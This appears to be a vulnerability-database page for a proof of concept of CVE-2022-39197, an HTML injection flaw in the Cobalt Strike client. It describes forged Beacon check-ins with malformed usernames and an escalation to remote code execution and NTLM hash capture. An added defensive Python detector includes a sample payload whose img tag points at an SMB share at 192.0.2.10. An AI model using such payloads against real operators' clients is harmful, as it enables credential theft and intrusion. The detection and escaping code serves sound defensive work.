
CVE-2022-39197 PoC — HelpSystems Cobalt Strike cross-site scripting vulnerability

Source
Associated Vulnerability
Title: HelpSystems Cobalt Strike cross-site scripting vulnerability (CVE-2022-39197)
Description: HelpSystems Cobalt Strike is penetration-testing software from the US company HelpSystems. HelpSystems Cobalt Strike 4.7 and earlier contain a cross-site scripting (XSS) vulnerability that allows a remote attacker to execute HTML on the Cobalt Strike team server (the markup is rendered by the operator's Java Swing client).
Readme
Reproducing the Cobalt Strike RCE vulnerability CVE-2022-39197

Vulnerability summary

The vulnerability lies in Cobalt Strike's handling of Beacon check-in data: an attacker can set a malformed username in the Beacon configuration (or in a forged check-in built from an extracted configuration), which triggers an XSS when that username is rendered in the Cobalt Strike UI and can be escalated to remote code execution on the Cobalt Strike server side. The fix shipped in Cobalt Strike 4.7.1.

Screenshot:
<img width="1280" alt="image" src="https://user-images.githubusercontent.com/63894044/192103980-08cda95c-6b6c-4ae8-ab54-28c28c8c1314.png">

Capturing the NTLMv2-SSP hash; this requires the Cobalt Strike client that renders the injected HTML to be running on Windows, since the injected markup makes it authenticate to an attacker-controlled SMB share.

<img width="519" alt="image" src="https://user-images.githubusercontent.com/63894044/192104044-ca103ccd-e9dd-4a71-913f-5a9bacb695c5.png">
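The check-ins that trigger this bug differ from benign ones only in a metadata field that carries markup (and, for the hash-capture variant above, a UNC path). The script below is an added example, not code from the PoC repository or from Cobalt Strike: it triages the user/computer/process fields of a check-in for that pattern and shows the escaping that would have made the Swing client render the field as literal text. The `Checkin` class, the two sample check-ins and the 192.0.2.10 address are constructed for illustration.

```python
"""
Triage Beacon check-in metadata for the HTML-injection pattern behind
CVE-2022-39197: a field (here the username) that the Cobalt Strike client
renders as Swing HTML instead of plain text.

Added example, not from the original PoC repository. The field names and
the sample check-in values below are constructed for illustration.
"""
import html
import re
from dataclasses import dataclass

# Any markup tag such as <html>, <img ...>, </b>
HTML_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^<>]*>")
# A UNC path like \\host\share\file, the shape an <img src> uses to make a
# Windows client authenticate to an attacker's SMB server (NTLMv2-SSP capture).
UNC_PATH_RE = re.compile(r"\\\\[^\\\s\"'<>]+\\[^\s\"'<>]*")


@dataclass
class Checkin:
    """Subset of Beacon metadata fields shown in the client UI (constructed)."""
    computer: str
    user: str
    process: str


def find_injection(value: str) -> list[str]:
    """Return the kinds of suspicious content found in one metadata field."""
    findings = []
    if HTML_TAG_RE.search(value):
        findings.append("html_tag")
        # Swing's BasicHTML only switches to HTML rendering when the text
        # begins with the literal <html> tag, so that prefix is the real trigger.
        if value.lower().startswith("<html>"):
            findings.append("swing_html_prefix")
    if UNC_PATH_RE.search(value):
        findings.append("unc_path")
    return findings


def sanitize(value: str) -> str:
    """Escape a field so a Swing component renders it as literal text.
    html.escape turns '<' into '&lt;', so the string can no longer begin
    with '<html>' and no tag survives."""
    return html.escape(value, quote=True)


def triage(checkin: Checkin) -> dict[str, list[str]]:
    """Map each field name to its findings; an empty dict means nothing suspicious."""
    result = {}
    for name in ("computer", "user", "process"):
        findings = find_injection(getattr(checkin, name))
        if findings:
            result[name] = findings
    return result


# Constructed sample check-ins (not captured traffic)
BENIGN = Checkin(computer="DESKTOP-1", user="alice", process="explorer.exe")
MALICIOUS = Checkin(
    computer="DESKTOP-1",
    user='<html><img src="\\\\192.0.2.10\\share\\x.png">',
    process="explorer.exe",
)

if __name__ == "__main__":
    for c in (BENIGN, MALICIOUS):
        print(triage(c))
    print(sanitize(MALICIOUS.user))
```

Note that escaping neutralises the tag but leaves the UNC text in place; that is fine once it is no longer an `<img src>`, but `find_injection` still reports it, which is the behaviour you want from a detector that feeds a hunting query.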

References:

https://www.freebuf.com/vuls/345522.html

https://mp.weixin.qq.com/s?__biz=MzI5Nzc3NDEyNA==&mid=2247483757&idx=1&sn=2397d14549520bac3bd7bec10d433db3&chksm=ecaebc2edbd9353803e2a3f0f5f906121db63e30e76c58654169656e9e40d5c8b5b0e8b80813&token=1380424937&lang=zh_CN#rd

https://forum.butian.net/share/708

https://github.com/Sentinel-One/CobaltStrikeParser

https://github.com/LiAoRJ/CS_fakesubmit
File Snapshot

/data/pocs/3da0550c517dce59ad1f84602994817ea0782636
└── README.md (1009 bytes)

0 directories, 1 file